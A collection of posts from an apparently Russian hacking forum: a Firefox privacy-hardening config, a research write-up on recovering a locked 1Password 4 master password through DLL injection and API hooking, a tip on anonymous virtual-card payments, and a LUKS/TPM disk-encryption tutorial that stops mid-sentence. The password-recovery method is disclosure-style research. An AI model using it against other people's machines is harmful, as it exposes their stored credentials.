user_pref("dom.gamepad.enabled", false); user_pref("dom.gamepad.non_standard_events.enabled", false); user_pref("dom.imagecapture.enabled", false); user_pref("dom.presentation.discoverable", false); user_pref("dom.presentation.discovery.enabled", false); user_pref("dom.presentation.enabled", false); user_pref("dom.presentation.tcp_server.debug", false); user_pref("media.getusermedia.aec_enabled", false); user_pref("media.getusermedia.audiocapture.enabled", false); user_pref("media.getusermedia.browser.enabled", false); user_pref("media.getusermedia.noise_enabled", false); user_pref("media.getusermedia.screensharing.enabled", false); user_pref("media.navigator.enabled", false); user_pref("media.navigator.video.enabled", false); user_pref("media.navigator.permission.disabled", true); user_pref("media.video_stats.enabled", false); user_pref("dom.battery.enabled", false); user_pref("dom.vibrator.enabled", false); user_pref("dom.vr.require-gesture", false); user_pref("dom.vr.poseprediction.enabled", false); user_pref("dom.vr.openvr.enabled", false); user_pref("dom.vr.oculus.enabled", false); user_pref("dom.vr.oculus.invisible.enabled", false); user_pref("dom.vr.enabled", false); user_pref("dom.vr.test.enabled", false); user_pref("dom.vr.puppet.enabled", false); user_pref("dom.vr.osvr.enabled", false); user_pref("dom.vr.external.enabled", false); user_pref("dom.vr.autoactivate.enabled", false); user_pref("media.webspeech.synth.enabled", false); user_pref("media.webspeech.test.enable", false); user_pref("media.webspeech.synth.force_global_queue", false); user_pref("media.webspeech.recognition.force_enable", false); user_pref("media.webspeech.recognition.enable", false);

Отключаем телеметрию и отправку отчетов

Браузер собирает телеметрические данные и сигнализирует разработчикам о падениях компонентов. Для повышения анонимности это можно отключить.

Code:Copy to clipboard

user_pref("toolkit.telemetry.archive.enabled", false); user_pref("toolkit.telemetry.bhrPing.enabled", false); user_pref("toolkit.telemetry.cachedClientID", ""); user_pref("toolkit.telemetry.firstShutdownPing.enabled", false); user_pref("toolkit.telemetry.hybridContent.enabled", false); user_pref("toolkit.telemetry.newProfilePing.enabled", false); user_pref("toolkit.telemetry.previousBuildID", ""); user_pref("toolkit.telemetry.reportingpolicy.firstRun", false); user_pref("toolkit.telemetry.server", ""); user_pref("toolkit.telemetry.server_owner", ""); user_pref("toolkit.telemetry.shutdownPingSender.enabled", false); user_pref("toolkit.telemetry.unified", false); user_pref("toolkit.telemetry.updatePing.enabled", false); user_pref("datareporting.healthreport.infoURL", ""); user_pref("datareporting.healthreport.uploadEnabled", false); user_pref("datareporting.policy.dataSubmissionEnabled", false); user_pref("datareporting.policy.firstRunURL", ""); user_pref("browser.tabs.crashReporting.sendReport", false); user_pref("browser.tabs.crashReporting.email", false); user_pref("browser.tabs.crashReporting.emailMe", false); user_pref("breakpad.reportURL", ""); user_pref("security.ssl.errorReporting.automatic", false); user_pref("toolkit.crashreporter.infoURL", ""); user_pref("network.allow-experiments", false); user_pref("dom.ipc.plugins.reportCrashUR", false); user_pref("dom.ipc.plugins.flash.subprocess.crashreporter.enabled", false);

Настраиваем информацию для поиска

Приводим поиск браузера в «стандартное» состояние — без поправок на наше местоположение.

Code:Copy to clipboard

user_pref("browser.search.geoSpecificDefaults", false); user_pref("browser.search.geoSpecificDefaults.url", ""); user_pref("browser.search.geoip.url", ""); user_pref("browser.search.region", "US"); user_pref("browser.search.suggest.enabled", false); user_pref("browser.search.update", false);

Разбираемся с пуш-уведомлениями

Пуш-уведомления могут работать даже тогда, когда ты закрыл страницу.

Code:Copy to clipboard

user_pref("dom.push.enabled", false); user_pref("dom.push.connection.enabled", false); user_pref("dom.push.serverURL", "");

А теперь не могут.

Убираем утечки DNS

Здесь убираем возможную утечку DNS по IPv6, отключаем упреждающую отправку DNS и настраиваем DoH — DNS over HTTPS.

Code:Copy to clipboard

user_pref("network.dns.disablePrefetch", true); user_pref("network.dns.disableIPv6", true); user_pref("network.security.esni.enabled", true); user_pref("network.trr.mode", 2); user_pref("network.trr.uri", "https://cloudflare-dns.com/dns-query");

Отключаем перенаправления

Code:Copy to clipboard

user_pref("network.captive-portal-service.enabled", false); user_pref("network.captive-portal-service.maxInterval", 0); user_pref("captivedetect.canonicalURL", "");

Пресекаем слив данных на серверы Google

С настройками по умолчанию Google должен защищать тебя от вирусов и фишинга. Это зачастую полезная функция, но если ты знаешь, что ты делаешь, и не хочешь, чтобы Google за этим наблюдал, то можешь и избавиться от этого пристального внимания.

Code:Copy to clipboard

user_pref("browser.safebrowsing.allowOverride", false); user_pref("browser.safebrowsing.blockedURIs.enabled", false); user_pref("browser.safebrowsing.downloads.enabled", false); user_pref("browser.safebrowsing.downloads.remote.block_dangerous", false); user_pref("browser.safebrowsing.downloads.remote.block_dangerous_host", false); user_pref("browser.safebrowsing.downloads.remote.block_potentially_unwanted", false); user_pref("browser.safebrowsing.downloads.remote.block_uncommon", false); user_pref("browser.safebrowsing.downloads.remote.enabled", false); user_pref("browser.safebrowsing.malware.enabled", false); user_pref("browser.safebrowsing.phishing.enabled", false); user_pref("browser.safebrowsing.downloads.remote.url", ""); user_pref("browser.safebrowsing.provider.google.advisoryName", ""); user_pref("browser.safebrowsing.provider.google.advisoryURL", ""); user_pref("browser.safebrowsing.provider.google.gethashURL", ""); user_pref("browser.safebrowsing.provider.google.reportMalwareMistakeURL", ""); user_pref("browser.safebrowsing.provider.google.reportPhishMistakeURL", ""); user_pref("browser.safebrowsing.provider.google.reportURL", ""); user_pref("browser.safebrowsing.provider.google.updateURL", ""); user_pref("browser.safebrowsing.provider.google4.advisoryName", ""); user_pref("browser.safebrowsing.provider.google4.advisoryURL", ""); user_pref("browser.safebrowsing.provider.google4.dataSharingURL", ""); user_pref("browser.safebrowsing.provider.google4.gethashURL", ""); user_pref("browser.safebrowsing.provider.google4.reportMalwareMistakeURL", "");

Отключаем DRM
…просто потому, что можем!

Code:Copy to clipboard

user_pref("browser.eme.ui.enabled", false); user_pref("media.eme.enabled", false);

Итак, мы рассмотрели некоторые базовые настройки браузера Firefox, которые помогут тебе не делиться ни с кем своими данными. Как видишь, без этих настроек браузер фактически следит за каждым шагом, собирает кучу метрик и отправляет их туда и сюда. Раз все это можно отключить, почему бы не сделать этого?

Конечно, этот гайд нельзя назвать абсолютно полным — я уверен, что в сотнях настроек браузера найдется что-то еще, что можно оптимизировать и улучшить, но основную массу собираемых данных мы все-таки перекрыли. Еще надо помнить, что от версии к версии названия настроек могут меняться, какие-то могут уходить, а другие — приходить, поэтому файл нужно будет время от времени обновлять.

10 полезных плагинов для Firefox

Как бы мы ни настраивали браузер, кое-каких вещей можно добиться только плагинами. Они тоже могут неплохо помочь с укреплением нашей безопасности при серфинге в интернете. Вот некоторые из тех, что я использую и считаю необходимыми.

Privacy Possum — блокирует различные методы слежения: рефереры, заголовки ETag, сторонние куки, портит данные фингерпринта.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F201244.png&hash=42b5c8977e203cd8fe0f15a5a1d90fb6)

uBlock Origin — отличный блокировщик рекламы и не только. Содержит обширные списки блокировки, единственный нюанс — львиную долю списков блокировки нужно будет активировать самостоятельно в настройках, потому что они отключены по умолчанию.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F157572.png&hash=cd3b311b5f3a9084a2d58d7dbcaf55ed)

uMatrix — расширение, разработанное автором uBlock Origin. Представляет собой мощный блокировщик запросов браузера, а в связке с uBlock становится мощным средством против рекламы и прочей мишуры. Однако требует настройки практически под каждый сайт.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F158458.png&hash=6e25182cf628252b5394a2f88175ab93)

Nano Defender — хорошее дополнение к блокировщику рекламы — плагин противодействует антиадблокерам.

Decentraleyes — полезный плагин, который препятствует отслеживанию через CDN (Content Delivery Network).
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F137406.png&hash=aa876975da8ac9c3a5204e8606914314)

Facebook Container — плагин, разработанный в Mozilla. Пытается остановить слежку со стороны Facebook.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F200007.png&hash=0490e3ba9edc2401aefd36cc88db9556)

Google search link fix — расширение, которое чистит поисковую выдачу Yandex и Google, не позволяя поисковику собирать статистику кликов по ссылкам в выдаче.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F65241.png&hash=ad42a33dccbd5c5f6cf616d5070cee94)

NoScript — популярное расширение, которое блокирует скрипты на сайтах. Очень полезно, потому что как раз скрипты часто нарушают анонимность.

HTTPS Everywhere — автоматически переключает соединение на HTTPS, даже когда это явно не было указано в адресной строке.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F214771.png&hash=0cb9964a452942ce086fc18e10350d7d)

Privacy Badger — еще одно расширение от Фонда электронных рубежей, которое препятствует слежке со стороны сайтов.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F03%2F210953%2F171793.png&hash=18c9cc1f4390bcf142e74acd73cb30ab)

Автор: xtahi0nix aka Nik Zerof
хакер.ру

Достаём мастер-пароль из заблокированного менеджера паролей 1Password 4

ID: 676533bbb4103b69df371d6c
Thread ID: 28009
Created: 2019-02-23T22:33:56+0000
Last Post: 2019-02-23T22:33:56+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

Новые инструменты, старые методы. Проводим обратную разработку и находим фатальный недостаток 1Password.

Все любят менеджеры паролей. Они великолепны по многим причинам. Лично у меня в менеджере более 200 записей. С таким большим количеством конфиденциальных данных в одном месте важно понимать масштаб ущерба в случае компрометации вашей записи, будь то вредоносные программы, эксплоиты или просто компьютер, оставленный без присмотра на несколько минут. [Washington Post](https://www.washingtonpost.com/technology/2019/02/19/password-managers- have-security-flaw-you-should-still-use-one/)недавно опубликовала статью, основанную на нашем [исследовании](https://www.securityevaluators.com/casestudies/password- manager-hacking/). Эта статья помогает довести людей, что не все менеджеры паролей одинаковы.

Я свято верил, что заблокированный парольный менеджер надёжно защищён. Если кто-то получит доступ к моему компьютеру, то максимум может рассчитывать на кучку случайных байтов, поскольку информация надёжно вычищается из памяти.
Это верно для 1Password 4 (Обратите внимание, что последняя версия на сегодня седьмая). Прежде чем перейти на него несколько лет назад я проверил, что в памяти действительно нет паролей в открытом виде, когда менеджер в заблокированном состоянии. Так что в случае компрометации злоумышленнику придётся иметь дело с зашифрованным хранилищем.

Хранилище заперто!

В этом состоянии в памяти нет ни парольных записей, ни мастер-пароля. Очень разумно и правильно, и 1Password 4 прошёл эту проверку. Или нет?

Чтобы избавить от скучных деталей, скажу сразу: мы смогли восстановить мастер- пароль из заблокированного инстанса в 1Password 4, как показано ниже.

Разблокировка 1Password 4 и восстановление мастер-пароля

В анимации показано, что 1Password 4 сначала разблокируется нормальным способом, а затем запирается. После этого мы запускаем нашу утилиту multipass, которая успешно восстанавливает пароль. Утилита эксплуатирует неправильную обработку поля ввода пароля в 1Password 4, чтобы восстановить обфусцированный буфер мастер- пароля, деобфусцировать его, автоматически разблокировать 1Password 4 и, наконец, отобразить мастер-пароль в консоли.

Скучные детали

Первый шаг при оценке менеджера паролей: проверить наличие мастер-пароля в памяти в открытом виде. Это возможно в любом hex-редакторе, который способен взаимодействовать с пространством памяти процесса. Например, бесплатный редактор HxD. С его помощью можно открыть пространство памяти 1Password 4.

Мы сразу попадаем в первую читаемую область пространства памяти 1Password 4.

Пример представления памяти HxD

Пока ничего особенного. Но можно выполнить поиск. Например, как выглядит ситуация, если набрать пароль в окне разблокировки 1Password 4, но не нажать кнопку «Разблокировать»:

Запертое хранилище 1Password 4 с введённым мастер-паролем в поле

Наверняка пароль где-то в памяти?

Открываем HxD, но поиск строки с нашим мастер-паролем (“Z3Superpass#”) не даёт результатов.

Похоже, 1Password как-то шифрует или обфусцирует форму по мере её ввода. Если процедура работает правильно, то всё хорошо.

Погружаемся глубже

Чтобы узнать, почему мастер-пароль нельзя найти в памяти, когда он явно присутствует в диалоговом окне разблокировки, следует найти код, который с ним взаимодействует. Тут есть несколько способов. Можно отследить обработку событий клавиатуры и мыши путём локализации ‘GetMessage’, ‘PeekMessage’, ‘GetWindowText’ или других Windows API, которые обычно обрабатывают пользовательский ввод. Так мы найдём буфера, куда записываются нажатия клавиш, а через них выйдем на подпрограмму шифрования/обфускации. Но это долгий и подверженный ошибкам процесс, особенно с большими фреймворками, которые иногда очень странно управляют памятью, так что для отслеживания буфера придётся сделать множество копий и преобразований.

Вместо этого используем собственный инструмент Thread Imager, созданный для обратной разработки «странных» проприетарных протоколов на прикладном уровне. Он поможет определить, в каком месте памяти 1Password 4 взаимодействует с нашим мастер-паролем. Инструмент «автоматически» идентифицирует области кода в 1Password 4, которые взаимодействуют с обфусцированным паролем (он просто подсвечивает инструкции, которые взаимодействуют с интересующими данными, для дальнейшего анализа). Результат выглядит примерно так:

Thread Imager находит код 1Password 4, который взаимодействует с необфусцированным мастер-паролем

Поскольку мастер-пароль хранится в памяти в обфусцированном виде, то инструмент должен первым делом показать, в каком месте происходит обфускация.

Фрагмент из первого результата показывает, что первое появление мастер-пароля сопровождается переходом кода с адреса 0x7707A75D на 0x701CFA10.

Подробная запись в Thread Imager подсвечивает переход кода с с 0x7707A75D на 0x701CFA10, при этом на буфер с мастер-паролем ссылаются регистры EAX и ECX

Изучение этого места 0x7707A75D в отладчике (x64dbg) подтверждает нашу теорию. Действительно, впервые строка ‘Z3superpass#’ встречается при завершении работы функции декодирования ‘RtlRunDecodeUnicodeString’ из библиотеки ntdll.dll.

После небольшого анализа ясно, что для обфускации пароля используются именно эти две функции: ‘RtlRunEncodeUnicodeString’ и ‘RtlRunDecodeUnicodeString’. Так мастер-пароль прячут от примитивного копирования из памяти, вот почему раньше мы не могли найти его в hex-редакторе.

Если изучить закодированный буфер в конце работы функции RtlRunEncodeUnicodeString, то зашифрованная строка с мастер-паролем выглядит так:

Зашифрованный мастер-пароль

После RtlRunDecodeUnicodeString’ он декодируется:

Расшифрованный мастер-пароль

Интересно, что эта область сохраняется по тому же адресу 0x00DFA790 и мы буквально можем наблюдать её изменение при вводе пароля в окно разблокировки 1Password 4:

Уязвимость

‘RtlRunEncodeUnicodeString’ и ‘RtlRunDecodeUnicodeString’ — простые функции, которые изменяют строку простой операцией XOR. Это не так уж плохо: похоже, это стандартный метод маскировки всех нативных редактирующих управляющих элементов Windows при установленном флаге ‘ES_PASSWORD'.

Проблема в том, что после разблокировки 1Password 4 зашифрованный мастер- пароль не очищается из памяти.

Хуже того, он остаётся в памяти и после блокировки 1Password 4. То есть у нас есть заблокированное хранилище паролей, но с зашифрованным мастер-паролем в памяти.

И что ещё хуже, поскольку мы взаимодействуем с диалоговым окном ввода мастер- пароля, одна и та же область памяти повторно используется вместе с тем же значением XOR, что даёт нам лёгкий доступ к закодированному буферу для создания эксплоита.

Задача

Чтобы создать надёжный эксплоит для 1Password 4, нужно получить более чёткое представление, как мастер-пароль обрабатывается рабочими процессами программы. С помощью вышеупомянутых инструментов мы построили диаграмму выходных данных (рисунок ниже).

По такой диаграмме легче понять, где и какие задействуются библиотеки, чтобы надёжно идентифировать области в памяти, откуда можно извлечь мастер-пароль.

Эксплоит

Что мы имеем на данный момент? У нас запертое хранилище, а где-то в памяти хранится обфусцированный пароль, поскольку программа не почистила за собой память надлежащим образом.

Чтобы извлечь его, нужно вызвать процедуру в 1Password 4, которая инициирует ‘RtlRunEncodeUnicodeString’ и ‘RtlRunDecodeUnicodeString’. Таким образом она покажет расположение буфера памяти с закодированным мастер-паролем.

Область памяти с обфусцированным мастер-паролем

Без этого буфера пришлось бы погрузиться в бездну внутренних процедур и элементов управления Windows и связанных с ними механизмов управления памятью. Может, такой анализ и позволяет легко найти буфер, но мы не пошли по этому пути.

Похоже, единственный способ вызвать ‘RtlRunEncodeUnicodeString’ и ‘RtlRunDecodeUnicodeString’ — это ввести в символ в диалоговое окно ввода мастер-пароля. Так мы получаем нужный буфер. Но мы не знаем длину пароля.

Мы решили эту проблему путём перехвата кода, который обращается к первому символу нашего буфера, блокируя попытку изменения. Эта подпрограмма находится в цикле обработки сообщений управляющего элемента в comctl32, который обрабатывает управление буфером соответствующих элементов. Вызов ‘memmove’ со смещением 0x70191731 перезаписывает буфер введённым символом:

(Побочный эффект: выделенная строка (жёлтая) обновляет всю строку пароля)

Теперь мы, наконец, получили всё, что нужно для создания эксплоита. Следующие шаги позволят нам извлечь мастер-пароль:

Хук ‘memmove’, чтобы предотвратить перезапись первого байта мастер-пароля.

Хук ‘RtlRunEncodeUnicodeString’, чтобы получить расположение буфера обфусцированного мастер-пароля.

Хук ‘RtlRunDecodeUnicodeString’ для обращения к обфусцированному буферу, полученному на предыдущем этапе.

Ввод символа в поле ввода пароля и отказ от шага 1 (сохранение всего мастер-пароля), перенаправление шага 2 на шаг 3 для декодирования обфусцированного мастер-пароля.

Для выполнения всех этих действий создаём DLL с кодом обработчика всех этих хуков. Библиотека внедряется в процесс 1Password 4, отправляет один символ в диалоговое окно мастер-пароль, запуская шаги memmove, RtlRunEncodeUnicodeString и RtlRunDecodeUnicodeString, которые мы можем перехватить — и производя нашу магию по восстановлению обфусцированного мастер-пароля. Большая часть магии происходит в DetourRtlRunEncodeUnicodeString, это хук для функции ‘RtlRunEncodeUnicodeString’, показанный ниже:

Что приводит нас к окончательному результату: разблокировка запертого хранилища 1Password 4 любой версии при помощи глючной процедуры в используемых Windows API:

Резюме

Когда мы впервые углубились во внутренности 1Password 4, то ожидали встретить какую-то сложную систему защиты и ожидали, что вся секретная информация будет очищаться из памяти, как это происходит в процедурах PBKDF2 и других областях, где используется мастер-пароль. Соответствующие записи тоже очищаются. Однако по недосмотру поле ввода пароля рассматривается как стандартный элемент управления Windows API со скрытым паролем, что подрывает безопасность 1Password 4.

(с) 2019, автор: m1rko

Аnon VCC билайн для покупок

ID: 676533bbb4103b69df371bbe
Thread ID: 55693
Created: 2021-08-22T13:57:38+0000
Last Post: 2021-08-22T13:57:38+0000
Author: Tubu
Prefix: Статья
Replies: 0 Views: 2K

Можно использовать Qiwi, Яндекс, Юмани и их виртуальные карты для покупок в магазинах.

Расскажу о ещё одном способе, способ менее затратный)
Добываем сим-карту «Билайн»
Заходим в «личный кабинет», VCC «Билайн».
Заходим в «Google Pay» или « Apple Pay» , вяжем VCC.

Снять деньги с виртуальной карты нельзя, непосредственно с оплатой годный инструмент.

Любой shop, где поддерживается бесконтактная оплата с доставкой или где поддерживается оплата через apple pay/google pay, в ресторане, пиццу домой заказать и терминал тебе привозят, оплата без проблем. В интернет магазинах тоже можно.
Я использую для оплаты магазинов с продуктами, заказа еды домой и тд И не забываю юзать промокоды!!!

Суммы закидываю на карты по 5-10 к, плюс ЯД и Киви

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/55695/

Подскажите по голосовой связи .

ID: 676533bbb4103b69df371bc0
Thread ID: 55218
Created: 2021-08-12T12:29:31+0000
Last Post: 2021-08-15T06:04:18+0000
Author: Alonebalone
Replies: 15 Views: 2K

Всем доброго вечера суток где-то около года видел статью о том как поднять свою линию связи через интернет защищённую для звонков через какое-то приложение не могу вспомнить что это и где видел . Заранее благодарен за ответы .

LUKS good! Ставим Linux на шифрованный раздел и делаем удобной работу с ним

ID: 676533bbb4103b69df371bc1
Thread ID: 55272
Created: 2021-08-13T13:56:01+0000
Last Post: 2021-08-13T13:56:01+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

Сегодня полнодисковое шифрование — это норма. В Windows для этого есть BitLocker, в macOS — FileVault и APFS. В Linux для тех же целей служит dm- crypt и LUKS. В этой статье я покажу, как установить ОС на шифрованный корневой раздел, настроить авторазблокировку при загрузке с помощью модуля TPM и новой фичи systemd-cryptsetup, а также резервировать ключ восстановления в Active Directory. Все трюки будем делать в Arch Linux, хотя ты с легкостью сможешь повторить их в своем любимом дистрибутиве.

Шифрование дисков в Linux реализуется с помощью подсистемы dm- crypt Crypto API (встроено в ядро начиная с версии 2.6). Подсистема dm-crypt работает благодаря модулю ядра, который отображает шифрованный диск в виртуальное устройство. На вид оно ничем не отличается от обычного блочного устройства хранения данных. Для управления ключами шифрования используется раздел LUKS (Linux Unified Key Setup). Формат LUKS позволяет использовать до восьми ключей шифрования для одного раздела.

КАК УСТРОЕН РАЗДЕЛ LUKS

Раздел LUKS имеет следующий формат.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fea111afe48c5640aae77ae0c239a5215%2F21398%2Fpartition.png&hash=11ef0220764ea816bcb22bf53a875e2e)
Он начинается с заголовка phdr, далее за ним следуют слоты с ключевыми данными (KM1, KM2, ..., KM8). За ключевыми данными располагаются данные, шифрованные мастер‑ключом.

Заголовок phdr хранит информацию о протоколе и режиме шифрования, длину ключей, идентификатор UUID и контрольную сумму мастер‑ключа.

В LUKS для одного зашифрованного раздела зарезервировано восемь слотов, в каждом из которых может храниться отдельный ключ. Любой из восьми ключей может быть использован для расшифровки раздела.

Заголовок и слоты ключей можно хранить на другом физическом носителе, отдельно от зашифрованных данных, тем самым реализуя многофакторную защиту. Но при утрате заголовка или слотов получить доступ к зашифрованным данным становится невозможно.

Для управления шифрованием дисков используется утилита cryptsetup.

С помощью этой утилиты возможно:

создавать шифрованные разделы LUKS;

открывать и закрывать разделы LUKS;

управлять слотами ключей;

дампить заголовок LUKS и мастер‑ключ.

Для работы cryptsetup требуются права суперпользователя и пароль шифрования.

ШИФРУЕМ

Переходим к практике! Шифровать мы будем только рутовый раздел. Есть, конечно, экзотические кейсы, когда, помимо раздела root, шифруется еще и раздел boot, но такая конфигурация поддерживается не всеми загрузчиками и не считается стандартной и рекомендованной. Мы же вообще не будем использовать загрузчик, так что оставляем boot в покое и шифруем все остальное.

Начнем собирать нашу систему, загрузившись с установочного диска.

Для начала разметим диск следующим образом: sda1 для /boot, sda2 для /. Схему разделов выбираем GPT.

Code:Copy to clipboard

$ parted /dev/sda mklabel gpt mkpart primary fat32 1MiB 501MiB $ parted /dev/sda set 1 esp on $ parted /dev/sda mkpart primary btrfs 501MiB 100%

Далее создадим наш LUKS на sda2.

Code:Copy to clipboard

$ cryptsetup luksFormat /dev/sda2 WARNING! ======== This will overwrite data on /dev/sda2 irrevocably. Are you sure? (Type 'yes' in capital letters): YES Enter passphrase for /dev/sda2: Verify passphrase: cryptsetup luksFormat /dev/sda2 18.16s user 1.88s system 80% cpu 24.742 total

Взглянем теперь на LUKS.

Code:Copy to clipboard

$ cryptsetup luksDump /dev/sda2 LUKS header information Version: 2 Epoch: 3 Metadata area: 16384 [bytes] Keyslots area: 16744448 [bytes] UUID: e04b5b87-6bfc-4f73-83b0-36f91d52f141 Label: (no label) Subsystem: (no subsystem) Flags: (no flags) Data segments: 0: crypt offset: 16777216 [bytes] length: (whole device) cipher: aes-xts-plain64 sector: 512 [bytes] Keyslots: 0: luks2 Key: 512 bits Priority: normal Cipher: aes-xts-plain64 Cipher key: 512 bits PBKDF: argon2i Time cost: 7 Memory: 483194 Threads: 2 Salt: a8 d7 82 ce 89 c8 0f d6 29 18 83 e5 5d 9d a7 f1 a2 6d 66 81 70 db c4 82 cc fb ae 81 4c 7f ed 0c AF stripes: 4000 AF hash: sha256 Area offset:32768 [bytes] Area length:258048 [bytes] Digest ID: 0 Tokens: Digests: 0: pbkdf2 Hash: sha256 Iterations: 149967 Salt: 87 ac 6f 61 75 fb 91 14 63 5d ca 5d 1c 25 ef 42 7b af 51 63 34 eb 26 d5 d7 be 7a 78 7b 2a 25 f1 Digest: da e7 fd 26 59 85 5d 5e 34 79 2a fa 20 95 f1 83 13 10 0d 0e a3 58 a6 0e 33 b0 f0 73 e8 0a a1 1e

Видно, что мы задействовали один из восьми доступных слотов с ключами — доступ к нему ограничен паролем.

Алгоритм шифрования по умолчанию (aes-xts-plain64) нас устроит. Перечень всех поддерживаемых алгоритмов зависит от ядра (загляни в /proc/crypto). Можно протестировать работу с ними.

Code:Copy to clipboard

$ cryptsetup benchmark # Tests are approximate using memory only (no storage IO) PBKDF2-sha1 1817289 iterations per second for 256-bit key PBKDF2-sha256 2302032 iterations per second for 256-bit key PBKDF2-sha512 1646116 iterations per second for 256-bit key PBKDF2-ripemd160 903944 iterations per second for 256-bit key PBKDF2-whirlpool 681778 iterations per second for 256-bit key argon2i N/A argon2id N/A # Algorithm | Key | Encryption | Decryption aes-cbc 128b 1126.9 MiB/s 2966.7 MiB/s serpent-cbc 128b 98.6 MiB/s 736.0 MiB/s twofish-cbc 128b 226.0 MiB/s 404.9 MiB/s aes-cbc 256b 868.5 MiB/s 2594.2 MiB/s serpent-cbc 256b 107.9 MiB/s 779.9 MiB/s twofish-cbc 256b 241.6 MiB/s 433.4 MiB/s aes-xts 256b 3152.7 MiB/s 3146.5 MiB/s serpent-xts 256b 676.5 MiB/s 665.9 MiB/s twofish-xts 256b 400.6 MiB/s 410.4 MiB/s aes-xts 512b 2614.9 MiB/s 2600.2 MiB/s serpent-xts 512b 687.1 MiB/s 711.3 MiB/s twofish-xts 512b 413.0 MiB/s 417.2 MiB/s cryptsetup benchmark 9.54s user 23.98s system 107% cpu 31.226 total

Откроем раздел.

Code:Copy to clipboard

$ cryptsetup open /dev/sda2 cryptroot Enter passphrase for /dev/sda2:

После этих манипуляций у нас в системе стал доступен новый раздел cryptroot.

Code:Copy to clipboard

$ lsblk /dev/sda NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS sda 8:0 0 8G 0 disk ├─sda1 8:1 0 500M 0 part └─sda2 8:2 0 7.5G 0 part └─cryptroot 253:0 0 7.5G 0 crypt

Создадим на разделах файловые системы.

Code:Copy to clipboard

$ mkfs.fat -F32 /dev/sda1 $ mkfs.btrfs -f -L "archroot" /dev/mapper/cryptroot

Для продолжения установки примонтируем наши разделы.

Code:Copy to clipboard

$ mount /dev/mapper/cryptroot /mnt $ btrfs subvolume create /mnt/@root $ btrfs subvolume create /mnt/@home $ umount /mnt $ mount /dev/mapper/cryptroot /mnt -o subvol=@root,ssd,noatime,space_cache,compress=zstd $ mkdir /mnt/home $ mount /dev/mapper/cryptroot /mnt/home -o subvol=@home,ssd,noatime,space_cache,compress=zstd $ mkdir /mnt/boot $ mount /dev/sda1 /mnt/boot

Заглядывая одним глазом в вики, устанавливаем систему обычным образом.

Не забудем включить хук encrypt при создании initramfs.

Code:Copy to clipboard

$ vim /etc/mkinitcpio.conf HOOKS=(base udev autodetect keyboard keymap modconf block encrypt filesystems) $ mkinitcpio -p linux

Финальный этап — настройка UEFI для загрузки нашего ядра. Напоминаю, что мы обойдемся без GRUB и будем загружать ядро напрямую, используя фичу EFISTUB.

Добавляем запись в UEFI.

Code:Copy to clipboard

$ efibootmgr \ --create \ --bootnum=0000 \ --label "Arch Linux" \ --disk /dev/sda \ --part 1 \ --loader /vmlinuz-linux \ --unicode 'cryptdevice=/dev/sda2:cryptroot root=/dev/mapper/cryptroot rootflags=subvol=@root rw initrd=\initramfs-linux.img' \ --verbose

Особое внимание обрати на параметры ядра! Без них система просто не сможет найти шифрованный раздел.

Перезагружаемся и убеждаемся, что все работает, как мы хотели: на этапе загрузки требуется ввод пароля для расшифрования раздела.
![first_reboot](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fea111afe48c5640aae77ae0c239a5215%2F21399%2Ffirst- reboot_KuSAUwK.png&hash=d2f4d8e39ca686cd3fbe78b4490c0cca)

НАСТРАИВАЕМ АВТОРАЗБЛОКИРОВКУ

Хотелось бы не вводить пароль при загрузке каждый раз. Для этого нужно настроить авторазблокировку LUKS с помощью чипа TPM.

Убедимся, что мы счастливые обладатели TPM. Необходимая версия TPM — 2.0.

Code:Copy to clipboard

$ test -e /dev/tpm0 && echo PASS || echo FAIL PASS $ cat /sys/class/tpm/tpm0/device/description TPM 2.0 Device or $ cat /sys/class/tpm/tpm0/tpm_version_major 2

Авторазблокировку сделаем с помощью относительно новой фичи systemd- cryptsetup. Systemd-cryptsetup добавлена в systemd начиная с [версии 248](https://lists.freedesktop.org/archives/systemd- devel/2021-March/046289.html).

Для начала необходимо проверить нашу версию systemd.

Code:Copy to clipboard

$ systemctl --version systemd 249 (249.2-1-arch) +PAM +AUDIT -SELINUX -APPARMOR -IMA +SMACK +SECCOMP +GCRYPT +GNUTLS +OPENSSL +ACL +BLKID +CURL +ELFUTILS +FIDO2 +IDN2 -IDN +IPTC +KMOD +LIBCRYPTSETUP +LIBFDISK +PCRE2 -PWQUALITY +P11KIT -QRENCODE +BZIP2 +LZ4 +XZ +ZLIB +ZSTD +XKBCOMMON +UTMP -SYSVINIT default-hierarchy=unified

Все отлично. Для работы с TPM нужно дополнительно установить пакет tpm2-tss.

Code:Copy to clipboard

$ pacman -Sy tpm2-tss

Далее добавим ключ TPM в слот LUKS с помощью тулзы systemd-cryptenroll.

Code:Copy to clipboard

$ systemd-cryptenroll /dev/sda2 --tpm2-device=auto --tpm2-pcrs=0,4

Не забываем проверить.

Code:Copy to clipboard

$ systemd-cryptenroll /dev/sda2 SLOT TYPE --------- 0 password 1 tpm2

В команде выше мы указали параметр --tpm2-pcrs=0,4. Что такое PCR? Вот определение из Википедии:

